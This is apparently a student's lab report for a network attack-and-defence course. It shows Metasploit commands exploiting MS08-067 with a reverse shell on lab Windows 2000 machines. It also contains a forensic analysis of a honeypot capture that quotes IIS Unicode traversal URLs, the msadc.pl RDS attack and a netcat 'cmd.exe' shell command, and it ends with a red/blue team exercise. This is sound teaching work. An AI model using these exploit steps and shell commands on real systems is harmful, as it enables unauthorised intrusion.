20252913 2025-2026-2 《网络攻防实践》实践六报告
20252913 2025-2026-2 《网络攻防实践》实践六报告
1.实践内容
1.1 Metasploit Windows远程渗透攻击
在一方作为攻击机,另一方作为靶机的模拟环境中,利用经典的MS08-067漏洞,完成从漏洞扫描、利用到最终获取目标主机控制权的全过程。
1.2 取证分析实践:解密一次NT系统破解攻击
分析一次针对Windows NT系统蜜罐的成功攻击,确定攻击者使用的具体破解工具,分析其攻击步骤,追踪攻击者在获取权限后的横向移动或后续操作行为,最后,根据攻击者的行为模式,判断其是否察觉目标为蜜罐。
1.3 团队对抗实践
在红蓝对抗场景中,综合运用攻击和防御分析技能,理解攻防两端的完整视角。
攻方(红队):选择一个适当的漏洞对目标(另一个同学的防守机)发起真实攻击,并成功获取系统访问权限。任务要求详细记录攻击者的身份信息、所利用的漏洞名称以及攻击涉及的IP地址。
守方(蓝队):在己方系统上部署网络监控工具Wireshark,捕获攻方攻击时产生的所有网络流量。通过深度分析这些数据包,尝试还原攻击者使用的攻击手法、利用的漏洞、发送的恶意载荷等关键信息,完成攻击过程报告。
2.实践过程
2.1 动手实践Metasploit windows attacker
攻击机(kali)IP:192.168.200.7
靶机(win2k)IP:192.168.200.8
1.在kali中切换root权限后,初始化metasploit并进入控制台:
service postgresql start
msfdb init
msfconsole

2.通过指令定位ms08_067漏洞模块,找到漏洞的路径
search ms08_067

3.通过指令加载此模块
use exploit/windows/smb/ms08_067_netapi

4.通过show options指令查看漏洞模块配置:

5.设置攻击载荷为反向tcp shell,配置攻击机和靶机ip,设置目标系统为自动识别模式:
set payload generic/shell_reverse_tcp
set RHOSTS 192.168.200.8
set LHOST 192.168.200.7
set TARGET 0

6.通过show options指令查看漏洞模块已完成配置:

7.通过exploit执行渗透攻击:

8.输入ipconfig查看靶机ip为192.1168.200.8,攻击成功

2.2 取证分析实践
1.在学习通下载snort-0204@0117.log文件后通过wireshark打开此文件,通过ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http过滤数据包:

2.观察117号数据包,追踪tcp流:

攻击者利用IIS的Unicode解码漏洞(如使用%C0%AF绕过),通过构造包含大量../的畸形URL(/guest/default.asp/..%C0%AF../boot.ini),试图跳出Web目录限制,非法读取系统核心配置文件boot.ini,从而获取服务器权限。

经分析确认,攻击者向目标 IIS 服务器的 /msadc/msadcs.dll接口发起了恶意请求。载荷中明显包含特征签名 !ADM!ROX!YOUR!WORLD!,结合漏洞指纹可判断,攻击者直接使用了 rain forest puppy 公开的 msadc(2).pl利用脚本。该攻击精准命中了 Windows MDAC RDS 组件漏洞,通过 SQL 注入实现了远程命令执行(RCE),为后续植入恶意负载和系统提权打开了入口。
在通过 RDS 漏洞获取远程代码执行权限后,攻击者进一步部署了反向 Shell 并下载了恶意工具,从而实现了对目标主机的持久化控制。
3.观察130号数据包:

攻击者尝试访问 /msadc/,试图利用 IIS 5.0 的 MSADC 组件缓冲区溢出漏洞。若利用成功,可直接在目标服务器上执行任意系统命令,获取最高控制权。
4.对119号数据包进行追踪:

攻击者在目标服务器上成功植入了 nc -l -p 6969 -e cmd.exe这一关键指令。该指令借助 Netcat 工具,在目标机的 6969 端口启动了一个监听进程,并将该进程的标准输入输出绑定至系统的 cmd.exe程序。通过此举,攻击者成功建立了一条反向 Shell 通道,从而直接获取了对目标服务器的交互式命令行控制权。
5.攻击者利用 FTP 协议进行后门植入与文件传输进行攻击:

攻击者使用用户名 johnazk和密码 haxedj00成功登录了目标服务器的 FTP 服务。攻击者在数据连接中主动上传了 nc.exe、pdump.exe和 samdump.dll三个文件。将网络调试和端口监听工具植入目标系统,为后续的权限维持和数据外泄搭建通道。
6.在取得对靶机的完全控制权限后,攻击者执行了多项系统操作,并识别出该环境实为蜜罐。随后,对其中 tcp.stream eq 174对应的 TCP 数据流进行了跟踪与分析。

攻击者利用 Windows IIS 服务器的 RDS 组件漏洞获得了远程命令执行权限。在成功建立交互式命令行控制后,其攻击活动进入了后渗透阶段,核心操作包括:通过系统命令(dir、cd)广泛遍历文件系统,侦察关键目录(如系统根目录、Program Files和 Web 根目录 InetPub\wwwroot)以了解环境;检索服务器上预存的漏洞工具库(C:\exploits和 C:\wiretrip),发现了大量针对不同系统的历史漏洞利用代码和知名攻击脚本(如 msadc.pl);最后,攻击者在 Web 根目录创建测试文件(test.txt)以验证写入权限,并特别创建了 rfp.txt文件,其内容“best honeypot i've seen till now 😃”明确表明攻击者已识别出该服务器是一个用于研究或诱捕的蜜罐系统。
7.问题回答:
-
攻击者使用了什么破解工具进行攻击:攻击者使用自动化渗透脚本 msadc(2).pl 作为核心攻击工具。该工具专门利用 Windows IIS 服务器中陈旧的 MDAC RDS 漏洞,通过构造恶意 SQL 查询实现远程命令执行
-
攻击者如何使用这个破解工具进入并控制了系统:首先利用 IIS 4.0/5.0 的 Unicode 目录遍历漏洞(如将 /编码为 %C0%AF),尝试读取系统文件(如 boot.ini),以此确认目标系统存在未修补的高危漏洞并识别其版本。随后,攻击脚本触发 RDS 漏洞,成功在目标服务器上执行系统命令。紧接着,通过 FTP 协议 将后门工具包(包括 nc.exe、pdump.exe等)上传至靶机。最终,攻击者通过命令 nc -l -p 6969 -e cmd.exe 在靶机上启动 Netcat 监听,成功建立了一个反向 Shell,从而获得了对目标服务器的完整交互式命令行控制权。
-
攻击者获得系统访问权限后做了什么:内网探测:使用 net等命令收集系统及用户信息。凭证窃取:运行 pdump.exe等工具导出系统密码哈希,为后续破解或横向移动做准备。痕迹清理:在操作完成后删除了部分上传的工具。嘲讽标记:在识别出环境异常后,特意创建了 rfp.txt文件,并留下“best honeypot I‘ve seen till now 😃”的文本,以示挑衅。
-
我们如何防止这样的攻击:及时修补:为所有系统与服务安装安全更新,重点修复此类已知的陈旧高危漏洞。最小权限:遵循最小权限原则运行Web服务,严格限制其执行系统命令和访问敏感资源的能力。网络防护:部署WAF、IPS等安全设备,配置规则以拦截和告警包含特征字符(如 %C0%AF)的恶意请求及异常外联流量。
-
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么:是的,攻击者已明确知晓。 最直接的证据是其在系统中留下的嘲讽文本
best honeypot i've seen till now :)。
2.3 团队对抗实践
1.这个实验由我和许超同学的电脑进行演示团队对抗实验,首先将我们的电脑连在同一个局域网内。然后编辑我们的kali以及win2kServer,设置成桥接模式,勾选上复制物理地址连接状态。

2.把win2kServer的网络连接改为自动获取IP地址。
3.修改完成后,两人电脑的配置如下:
-
20252913郭豪
-
kali:
192.168.1.108 -
win2kServer:
192.168.1.110
-
-
20252916许超
- kali2025.4:
192.168.1.107 - win2kServer:
192.168.1.111
- kali2025.4:
4.首先测试kali对许超两台主机的连通性:

5.在kali中通过msfconsole指令启动Metasploit框架控制台:

6.通过指令use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞模块。

7.通过指令show payloads列出该漏洞可兼容的攻击载荷:

8.通过指令设置反向TCP Shell载荷,设置Kali攻击机的IP(192.168.1.108)和win2kserver靶机IP(192.168.1.111):
set payload generic/shell_reverse_tcp
set LHOST 192.168.1.108
set RHOST 192.168.1.111

9.通过show options查看设置:

10.通过exploit指令执行攻击:

11.通过指令进行攻击:
mkdir guohao
cd guohao
echo guohao20252913>>test.txt

在许超的主机中可以看到攻击成功:

12.在kali中启动wireshark监测许超对我的主机的攻击,输入ip.addr == 192.168.1.110 and ip.addr == 192.168.1.107筛选数据包,可以看到对方的攻击指令:

同时在我的主机中可以看到许超的攻击结果:

3.学习中遇到的问题及解决
- 问题1:在实践内容1进行渗透时,对winxp靶机攻击失败
- 问题1解决方案:可能此主机系统已经修复了MS08-067漏洞,因此更换靶机为win2k,再次渗透攻击并成功。
4.实践总结
本次网络安全实践我通过动手操作对Windows靶机的渗透攻击,掌握了自动化漏洞利用工具的流程。在取证分析中,通过对攻击日志的分析,我学习了还原攻击链、溯源攻击者行为。通过团队攻防演练我体验了红蓝对抗的完整过程。通过本次实践我的网络安全意识和实践能力得到了提高。

浙公网安备 33010602011771号